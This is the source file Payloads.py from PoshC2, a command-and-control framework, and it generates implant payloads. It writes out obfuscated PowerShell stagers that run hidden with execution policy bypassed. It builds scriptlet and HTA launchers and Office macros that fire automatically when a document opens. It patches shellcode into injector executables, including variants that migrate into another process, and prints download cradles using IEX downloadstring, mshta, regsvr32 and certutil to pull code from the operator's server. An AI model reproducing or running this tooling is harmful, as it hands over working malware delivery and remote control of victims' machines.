PoshC2_Python/Payloads.py

561 lines
25 KiB
Python

#!/usr/bin/env python
from Config import PayloadsDirectory, QuickCommand, FilesDirectory, DefaultMigrationProcess
from Colours import Colours
from Utils import gen_key, randomuri, formStrMacro, formStr
import StringIO, gzip, io, base64, subprocess, os, hashlib, re
class Payloads(object):
quickstart = None
def __init__(self, KillDate, Key, HostnameIP, Domainfrontheader, Serverport, Proxyuser, Proxypass, Proxyurl, ImplantType, Proxy,
Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory):
self.KillDate = KillDate
self.Key = Key
self.DomainFrontHeader = Domainfrontheader
self.HostnameIP = HostnameIP
self.Serverport = Serverport
self.Proxyuser = Proxyuser
self.Proxypass = Proxypass
self.Proxyurl = Proxyurl
self.Proxy = Proxy
self.ImplantType = ImplantType
self.Insecure = Insecure
self.UserAgent = UserAgent
self.Referrer = Referrer
self.ConnectURL = ConnectURL
self.BaseDirectory = BaseDirectory
self.PSDropper = ""
self.PyDropper = ""
if os.path.exists("%saes.py" % PayloadsDirectory):
with open("%saes.py" % PayloadsDirectory, 'rb') as f:
content = f.read()
import re
m = re.search('#KEY(.+?)#KEY', content)
if m: keyfound = m.group(1)
self.PyDropperHash = hashlib.sha512(content).hexdigest()
self.PyDropperKey = keyfound
else:
self.PyDropperKey = gen_key()
randomkey = self.PyDropperKey
with open("%saes.py" % FilesDirectory, 'rb') as f:
content = f.read()
aespy = content.replace("#REPLACEKEY#","#KEY%s#KEY" % randomkey)
filename = "%saes.py" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(aespy)
output_file.close()
self.PyDropperHash = hashlib.sha512(aespy).hexdigest()
cs = content.replace("#REPLACEKILLDATE#",self.KillDate)
cs1 = cs.replace("#REPLACEPYTHONHASH#",self.PyDropperHash)
cs2 = cs1.replace("#REPLACESPYTHONKEY#",self.PyDropperKey)
cs3 = cs2.replace("#REPLACEKEY#",self.Key)
cs4 = cs3.replace("#REPLACEHOSTPORT#",(self.HostnameIP+":"+self.Serverport))
cs5 = cs4.replace("#REPLACEQUICKCOMMAND#",(self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_py"))
cs6 = cs5.replace("#REPLACECONNECTURL#",(self.HostnameIP+":"+self.Serverport+self.ConnectURL+"?m"))
cs7 = cs6.replace("#REPLACEDOMAINFRONT#",self.DomainFrontHeader)
cs8 = cs7.replace("#REPLACEUSERAGENT#",self.UserAgent)
with open("%sdropper.ps1" % FilesDirectory, 'rb') as f:
content = f.read()
cs = content.replace("#REPLACEINSECURE#",self.Insecure)
cs1 = cs.replace("#REPLACEHOSTPORT#",(self.HostnameIP+":"+self.Serverport))
cs2 = cs1.replace("#REPLACEIMPTYPE#",(self.HostnameIP+":"+self.Serverport+self.ConnectURL+self.ImplantType))
cs3 = cs2.replace("#REPLACEKILLDATE#",self.KillDate)
cs4 = cs3.replace("#REPLACEPROXYUSER#",self.Proxyuser)
cs5 = cs4.replace("#REPLACEPROXYPASS#",self.Proxypass)
cs6 = cs5.replace("#REPLACEPROXYURL#",self.Proxyurl)
cs7 = cs6.replace("#REPLACEPROXY#",self.Proxy)
cs8 = cs7.replace("#REPLACEDOMAINFRONT#",self.DomainFrontHeader)
cs9 = cs8.replace("#REPLACECONNECT#",self.ConnectURL)
cs10 = cs9.replace("#REPLACEUSERAGENT#",self.UserAgent)
cs11 = cs10.replace("#REPLACEREFERER#",self.Referrer)
self.PSDropper = cs11.replace("#REPLACEKEY#",self.Key)
def QuickstartLog(self, txt):
if not self.quickstart: self.quickstart = ''
print txt
self.quickstart += txt + '\n'
def WriteQuickstart(self, path):
with open(path, 'w') as f:
f.write(self.quickstart + Colours.END)
print ''
print 'Quickstart written to ' + path
def CreateRawBase(self, full=False):
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write((self.PSDropper))
gzipdata = base64.b64encode(out.getvalue())
b64gzip = "IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('%s'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" % gzipdata
batfile = "powershell -exec bypass -Noninteractive -windowstyle hidden -e " + base64.b64encode(b64gzip.encode('UTF-16LE'))
if full:
return batfile
else:
return base64.b64encode(b64gzip.encode('UTF-16LE'))
def CreateRaw(self, name=""):
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write((self.PSDropper))
gzipdata = base64.b64encode(out.getvalue())
b64gzip = "IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('%s'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" % gzipdata
filename = "%s%spayload.txt" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(self.PSDropper)
output_file.close()
self.QuickstartLog("Raw Payload written to: %s" % filename)
batfile = "powershell -exec bypass -Noninteractive -windowstyle hidden -e " + base64.b64encode(b64gzip.encode('UTF-16LE'))
filename = "%s%spayload.bat" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(batfile)
output_file.close()
self.QuickstartLog("Batch Payload written to: %s" % filename)
def PatchSharpBytes(self, filename, dll, offset, name=""):
fname = filename
filename = "%s%s" % (self.BaseDirectory,filename)
output_file = open(filename, 'wb')
output_file.write(base64.b64decode(dll))
output_file.close()
srcfilename = "%s%s%s" % (self.BaseDirectory,name,"dropper_cs.dll")
with open(srcfilename, "rb") as b:
dllbase64 = base64.b64encode(b.read())
patchlen = 48000 - len(dllbase64.encode('UTF-16LE'))
patch = dllbase64.encode('UTF-16LE')
patch2 = ""
patch2 = patch2.ljust(patchlen, '\x00')
patch3 = "%s%s" % (patch,patch2)
f = open(filename, "r+b")
f.seek(offset)
f.write(patch3)
f.close()
self.QuickstartLog("Payload written to: %s" % (filename))
def PatchBytes(self, filename, dll, offset, name):
filename = "%s%s" % (self.BaseDirectory,filename)
output_file = open(filename, 'wb')
output_file.write(base64.b64decode(dll))
output_file.close()
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write((self.PSDropper))
gzipdata = base64.b64encode(out.getvalue())
b64gzip = "sal a New-Object;iex(a IO.StreamReader((a System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String(\"%s\"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" % gzipdata
patchlen = 16000 - len((base64.b64encode(b64gzip.encode('UTF-16LE'))).encode('UTF-16LE'))
patch = (base64.b64encode(b64gzip.encode('UTF-16LE'))).encode('UTF-16LE')
patch2 = ""
patch2 = patch2.ljust(patchlen, '\x00')
patch3 = "%s%s" % (patch,patch2)
f = open(filename, "r+b")
f.seek(offset)
f.write(patch3)
f.close()
self.QuickstartLog("Payload written to: %s" % (filename))
def CreateDlls(self, name=""):
# Create Sharp DLL
with open("%sdropper.cs" % FilesDirectory, 'rb') as f:
content = f.read()
cs = content.replace("#REPLACEKEY#",self.Key)
cs1 = cs.replace("#REPLACEBASEURL#",(self.HostnameIP+":"+self.Serverport))
cs2 = cs1.replace("#REPLACESTARTURL#",(self.HostnameIP+":"+self.Serverport+self.ConnectURL+"?c"))
cs3 = cs2.replace("#REPLACEKILLDATE#",self.KillDate)
cs4 = cs3.replace("#REPLACEDF#",self.DomainFrontHeader)
cs5 = cs4.replace("#REPLACEUSERAGENT#",self.UserAgent)
cs6 = cs5.replace("#REPLACEREFERER#",self.Referrer)
cs7 = cs6.replace("#REPLACEPROXYURL#",self.Proxyurl)
cs8 = cs7.replace("#REPLACEPROXYUSER#",self.Proxyuser)
cs9 = cs8.replace("#REPLACEPROXYPASSWORD#",self.Proxypass)
self.QuickstartLog("C# Dropper Payload written to: %s%sdropper.cs" % (self.BaseDirectory,name))
filename = "%s%sdropper.cs" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(cs9)
output_file.close()
if os.name == 'nt':
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:library -out:%s%sdropper_cs.dll %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
compileexe = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:exe -out:%s%sdropper_cs.exe %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
else:
compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
subprocess.check_output(compile, shell=True)
self.QuickstartLog("C# Dropper DLL written to: %s%sdropper_cs.dll" % (self.BaseDirectory,name))
subprocess.check_output(compileexe, shell=True)
self.QuickstartLog("C# Dropper EXE written to: %s%sdropper_cs.exe" % (self.BaseDirectory,name))
# Load CLR "v2.0.50727"
self.QuickstartLog("" + Colours.END)
self.QuickstartLog("ReflectiveDLL that loads CLR v2.0.50727 - DLL Export (VoidFunc)" + Colours.GREEN)
with open('%sPosh_v2_x86_dll.b64' % FilesDirectory, 'r') as f:
v2_86 = f.read()
self.PatchBytes("%sPosh_v2_x86.dll" % name, v2_86, 0x00012D80, "DLL")
with open('%sPosh_v2_x64_dll.b64' % FilesDirectory, 'r') as f:
v2_64 = f.read()
self.PatchBytes("%sPosh_v2_x64.dll" % name, v2_64, 0x00014D00, "DLL")
# Load CLR "v4.0.30319"
self.QuickstartLog("" + Colours.END)
self.QuickstartLog("ReflectiveDLL that loads CLR v4.0.30319 - DLL Export (VoidFunc)" + Colours.GREEN)
with open('%sPosh_v4_x86_dll.b64' % FilesDirectory, 'r') as f:
v4_86 = f.read()
self.PatchBytes("%sPosh_v4_x86.dll" % name, v4_86, 0x00012F80, "DLL")
with open('%sPosh_v4_x64_dll.b64' % FilesDirectory, 'r') as f:
v4_64 = f.read()
self.PatchBytes("%sPosh_v4_x64.dll" % name, v4_64, 0x00014F00, "DLL")
# Load CLR "v4.0.30319"
self.QuickstartLog("" + Colours.END)
self.QuickstartLog("ReflectiveDLL that loads C# Implant in CLR v4.0.30319 - DLL Export (VoidFunc)" + Colours.GREEN)
with open('%sSharp_v4_x86_dll.b64' % FilesDirectory, 'r') as f:
v4_86 = f.read()
self.PatchSharpBytes("%sSharp_v4_x86.dll" % name, v4_86, 0x00012F80, "")
with open('%sSharp_v4_x64_dll.b64' % FilesDirectory, 'r') as f:
v4_64 = f.read()
self.PatchSharpBytes("%sSharp_v4_x64.dll" % name, v4_64, 0x00014F00, "")
self.QuickstartLog(Colours.END)
self.QuickstartLog("RunDLL Example:"+Colours.GREEN)
self.QuickstartLog("rundll32 Sharp_v4_x64.dll,VoidFunc")
def CreateShellcode(self, name=""):
# Load CLR "v2.0.50727"
self.QuickstartLog(Colours.END)
self.QuickstartLog("Shellcode that loads CLR v2.0.50727" + Colours.GREEN)
v2_86_offset = 0x000130E0 + 4
with open('%sPosh_v2_x86_Shellcode.b64' % FilesDirectory, 'r') as f:
v2_86 = f.read()
self.PatchBytes("%sPosh_v2_x86_Shellcode.bin" % name, v2_86, v2_86_offset, "Shellcode")
with open("%s%sPosh_v2_x86_Shellcode.bin" % (self.BaseDirectory, name), 'r') as binary:
with open("%s%sPosh_v2_x86_Shellcode.b64" % (self.BaseDirectory, name), 'w') as b64:
b64.write(base64.b64encode(binary.read()))
v2_64_offset = 0x00015150 + 8
with open('%sPosh_v2_x64_Shellcode.b64' % FilesDirectory, 'r') as f:
v2_64 = f.read()
self.PatchBytes("%sPosh_v2_x64_Shellcode.bin" % name, v2_64, v2_64_offset, "Shellcode")
with open("%s%sPosh_v2_x64_Shellcode.bin" % (self.BaseDirectory, name), 'r') as binary:
with open("%s%sPosh_v2_x64_Shellcode.b64" % (self.BaseDirectory, name), 'w') as b64:
b64.write(base64.b64encode(binary.read()))
# Load CLR "v4.0.30319"
self.QuickstartLog(Colours.END)
self.QuickstartLog("Shellcode that loads CLR v4.0.30319" + Colours.GREEN)
v4_86_offset = 0x000132E0 + 4
with open('%sPosh_v4_x86_Shellcode.b64' % FilesDirectory, 'r') as f:
v4_86 = f.read()
self.PatchBytes("%sPosh_v4_x86_Shellcode.bin" % name, v4_86, v4_86_offset, "Shellcode")
with open("%s%sPosh_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'r') as binary:
with open("%s%sPosh_v4_x86_Shellcode.b64" % (self.BaseDirectory, name), 'w') as b64:
b64.write(base64.b64encode(binary.read()))
v4_64_offset = 0x00015350 + 8
with open('%sPosh_v4_x64_Shellcode.b64' % FilesDirectory, 'r') as f:
v4_64 = f.read()
self.PatchBytes("%sPosh_v4_x64_Shellcode.bin" % name, v4_64, v4_64_offset, "Shellcode")
with open("%s%sPosh_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'r') as binary:
with open("%s%sPosh_v4_x64_Shellcode.b64" % (self.BaseDirectory, name), 'w') as b64:
b64.write(base64.b64encode(binary.read()))
# Load CLR "v4.0.30319" via SharpDLL
with open('%sSharp_v4_x86_Shellcode.b64' % FilesDirectory) as f:
v4_86 = f.read()
self.PatchSharpBytes("%sSharp_v4_x86_Shellcode.bin" % name, v4_86, 0x000132E0 + 4, name)
with open("%s%sSharp_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'r') as binary:
with open("%s%sSharp_v4_x86_Shellcode.b64" % (self.BaseDirectory, name), 'w') as b64:
b64.write(base64.b64encode(binary.read()))
with open('%sSharp_v4_x64_Shellcode.b64' % FilesDirectory) as f:
v4_64 = f.read()
self.PatchSharpBytes("%sSharp_v4_x64_Shellcode.bin" % name, v4_64, 0x00015350 + 8, name)
with open("%s%sSharp_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'r') as binary:
with open("%s%sSharp_v4_x64_Shellcode.b64" % (self.BaseDirectory, name), 'w') as b64:
b64.write(base64.b64encode(binary.read()))
def CreateSCT(self):
basefile = self.CreateRawBase()
raw1 = """<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
Dim ghgfhgfh
set ghgfhgfh = CreateObject("shell.application")
ghgfhgfh.ShellExecute "powershell.exe", " -exec bypass -Noninteractive -windowstyle hidden -e %s", "", "open", 0
</script>
</registration>
</scriptlet>
""" % basefile
raw2 = """<sCrIptlEt><scRIPt>
a=new ActiveXObject("Shell.Application").ShellExecute("powershell.exe"," -exec bypass -Noninteractive -windowstyle hidden -e %s","","open","0");
</scRIPt></sCrIptlEt>
""" % basefile
filename = "%srg_sct.xml" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(raw1)
filename = "%scs_sct.xml" % (self.BaseDirectory)
output_file.close()
output_file = open(filename, 'w')
output_file.write(raw2)
output_file.close()
self.QuickstartLog(Colours.END)
self.QuickstartLog("Execution via Command Prompt"+Colours.GREEN)
psuri = self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_bs"
pscmd = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system.net.webclient).downloadstring('%s')" % psuri
psurienc = base64.b64encode(pscmd.encode('UTF-16LE'))
uri = self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_cs"
#self.QuickstartLog("powershell -exec bypass -Noninteractive -windowstyle hidden -c \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system.net.webclient).downloadstring('%s')\"" % psuri)
#self.QuickstartLog("")
self.QuickstartLog("powershell -exec bypass -Noninteractive -windowstyle hidden -e %s" % psurienc)
self.QuickstartLog(Colours.END)
#self.QuickstartLog("Execution via Powershell"+Colours.GREEN)
#self.QuickstartLog("[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system.net.webclient).downloadstring('%s')" % psuri)
#self.QuickstartLog(Colours.END)
self.QuickstartLog("Other Execution Methods"+Colours.GREEN)
self.QuickstartLog("mshta.exe vbscript:GetObject(\"script:%s\")(window.close)" % uri)
uri = self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_rg"
self.QuickstartLog("regsvr32 /s /n /u /i:%s scrobj.dll" % uri)
self.QuickstartLog("")
def CreateHTA(self):
basefile = self.CreateRawBase(full=True)
hta = """<script>
ao=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"Sh"+"e"+"l"+"l");
ao.run('%s', 0);window.close();
</script>""" % basefile
self.QuickstartLog("HTA Payload written to: %sLauncher.hta" % self.BaseDirectory)
filename = "%sLauncher.hta" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(hta)
output_file.close()
def CreateCS(self):
basefile = self.CreateRawBase()
with open("%sSharp_Powershell_Runner.cs" % FilesDirectory, 'rb') as f:
content = f.read()
cs = content.replace("#REPLACEME#",basefile)
self.QuickstartLog("CS Powershell Stager source written to: %sSharp_Posh_Stager.cs" % self.BaseDirectory)
filename = "%sSharp_Posh_Stager.cs" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(cs)
output_file.close()
def CreatePython(self, name=""):
self.QuickstartLog(Colours.END)
self.QuickstartLog("OSX/Unix Python Payload:"+Colours.GREEN)
with open("%sdropper.py" % FilesDirectory, 'rb') as f:
content = f.read()
cs = content.replace("#REPLACEKILLDATE#",self.KillDate)
cs1 = cs.replace("#REPLACEPYTHONHASH#",self.PyDropperHash)
cs2 = cs1.replace("#REPLACESPYTHONKEY#",self.PyDropperKey)
cs3 = cs2.replace("#REPLACEKEY#",self.Key)
cs4 = cs3.replace("#REPLACEHOSTPORT#",(self.HostnameIP+":"+self.Serverport))
cs5 = cs4.replace("#REPLACEQUICKCOMMAND#",(self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_py"))
cs6 = cs5.replace("#REPLACECONNECTURL#",(self.HostnameIP+":"+self.Serverport+self.ConnectURL+"?m"))
cs7 = cs6.replace("#REPLACEDOMAINFRONT#",self.DomainFrontHeader)
self.PyDropper = cs7.replace("#REPLACEUSERAGENT#",self.UserAgent)
py = base64.b64encode(self.PyDropper)
pydropper_bash = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % py
filename = "%s%spy_dropper.sh" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(pydropper_bash)
output_file.close()
self.QuickstartLog(pydropper_bash)
pydropper_python = "import sys,base64;exec(base64.b64decode('%s'));" % py
filename = "%s%spy_dropper.py" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(pydropper_python)
output_file.close()
def CreateEXE(self, name=""):
with open("%s%sPosh_v4_x64_Shellcode.bin" % (self.BaseDirectory,name), 'rb') as f:
sc64 = f.read()
hexcode = "".join("\\x{:02x}".format(ord(c)) for c in sc64)
sc64 = formStr("char sc[]",hexcode)
with open("%sShellcode_Injector.c" % FilesDirectory, 'rb') as f:
content = f.read()
ccode = content.replace("#REPLACEME#",sc64)
self.QuickstartLog("64bit EXE Payload written to: %s%sPosh64.exe" % (self.BaseDirectory,name))
filename = "%s%sPosh64.c" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
with open("%sShellcode_Injector_Migrate.c" % FilesDirectory, 'rb') as f:
content = f.read()
ccode = content.replace("#REPLACEME#",sc64)
migrate_process = DefaultMigrationProcess
if "\\" in migrate_process and "\\\\" not in migrate_process:
migrate_process = migrate_process.replace("\\", "\\\\")
ccode = ccode.replace("#REPLACEMEPROCESS#", migrate_process)
self.QuickstartLog("64bit EXE Payload written to: %s%sPosh64_migrate.exe" % (self.BaseDirectory,name))
filename = "%s%sPosh64_migrate.c" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
with open("%s%sPosh_v4_x86_Shellcode.bin" % (self.BaseDirectory,name), 'rb') as f:
sc32 = f.read()
hexcode = "".join("\\x{:02x}".format(ord(c)) for c in sc32)
sc32 = formStr("char sc[]",hexcode)
with open("%sShellcode_Injector.c" % FilesDirectory, 'rb') as f:
content = f.read()
ccode = content.replace("#REPLACEME#",sc32)
self.QuickstartLog("32bit EXE Payload written to: %s%sPosh32.exe" % (self.BaseDirectory,name))
filename = "%s%sPosh32.c" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
with open("%sShellcode_Injector_Migrate.c" % FilesDirectory, 'rb') as f:
content = f.read()
ccode = content.replace("#REPLACEME#",sc32)
self.QuickstartLog("32bit EXE Payload written to: %s%sPosh32_migrate.exe" % (self.BaseDirectory,name))
filename = "%s%sPosh32_migrate.c" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
try:
uri = self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_ex6"
filename = randomuri()
self.QuickstartLog(Colours.END)
self.QuickstartLog("Download Posh64.exe using certutil:"+Colours.GREEN)
self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (uri,filename))
if os.name == 'nt':
compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64.c -o %s%sPosh64.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32.c -o %s%sPosh32.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
else:
compile64 = "x86_64-w64-mingw32-gcc %s%sPosh64.c -o %s%sPosh64.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
compile32 = "i686-w64-mingw32-gcc %s%sPosh32.c -o %s%sPosh32.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
subprocess.check_output(compile64, shell=True)
subprocess.check_output(compile32, shell=True)
filename = randomuri()
self.QuickstartLog(Colours.END)
self.QuickstartLog("Download Posh32.exe using certutil:"+Colours.GREEN)
self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (uri,filename))
if os.name == 'nt':
compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
else:
compile64 = "x86_64-w64-mingw32-gcc %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
compile32 = "i686-w64-mingw32-gcc %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
subprocess.check_output(compile64, shell=True)
subprocess.check_output(compile32, shell=True)
except Exception as e:
print e
print "apt-get install mingw-w64-tools mingw-w64 mingw-w64-x86-64-dev mingw-w64-i686-dev mingw-w64-common"
def CreateMacro(self, name=""):
basefile = self.CreateRawBase()
strmacro = formStrMacro("str",basefile)
macro="""Sub Auto_Open()
UpdateMacro
End Sub
Sub AutoOpen()
UpdateMacro
End Sub
Sub Workbook_Open()
UpdateMacro
End Sub
Sub WorkbookOpen()
UpdateMacro
End Sub
Sub Document_Open()
UpdateMacro
End Sub
Sub DocumentOpen()
UpdateMacro
End Sub
Sub UpdateMacro()
Dim str, exec
%s
exec = "p"
exec = exec + "o"
exec = exec + "w"
exec = exec + "e"
exec = exec + "r"
exec = exec + "s"
exec = exec + "h"
exec = exec + "e"
exec = exec + "l"
exec = exec + "l"
exec = exec + "."
exec = exec + "e"
exec = exec + "x"
exec = exec + "e"
exec = exec + " -exec bypass -Noninteractive -windowstyle hidden -e " & str
Shell(exec)
End Sub
""" % strmacro
self.QuickstartLog("Macro Payload written to: %s%smacro.txt" % (self.BaseDirectory,name))
filename = "%smacro.txt" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(macro)
output_file.close()
def CreateMsbuild(self, name=""):
x86filename = "%s%s" % (self.BaseDirectory,name+"Posh_v4_x86_Shellcode.bin")
x64filename = "%s%s" % (self.BaseDirectory,name+"Posh_v4_x64_Shellcode.bin")
with open(x86filename, "rb") as b86:
x86base64 = base64.b64encode(b86.read())
with open(x64filename, "rb") as b64:
x64base64 = base64.b64encode(b64.read())
with open("%scsc.cs" % FilesDirectory, 'rb') as f:
content = f.read()
ccode = content.replace("#REPLACEME32#",x86base64)
ccode = ccode.replace("#REPLACEME64#",x64base64)
filename = "%s%scsc.cs" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
self.QuickstartLog("")
self.QuickstartLog("CSC file written to: %s%scsc.cs" % (self.BaseDirectory,name))
with open("%smsbuild.xml" % FilesDirectory, 'rb') as f:
msbuild = f.read()
projname = randomuri()
msbuild = msbuild.replace("#REPLACEME32#",x86base64)
msbuild = msbuild.replace("#REPLACEME64#",x64base64)
msbuild = msbuild.replace("#REPLACEMERANDSTRING#",projname)
self.QuickstartLog("Msbuild file written to: %s%smsbuild.xml" % (self.BaseDirectory,name))
filename = "%s%smsbuild.xml" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(msbuild)
output_file.close()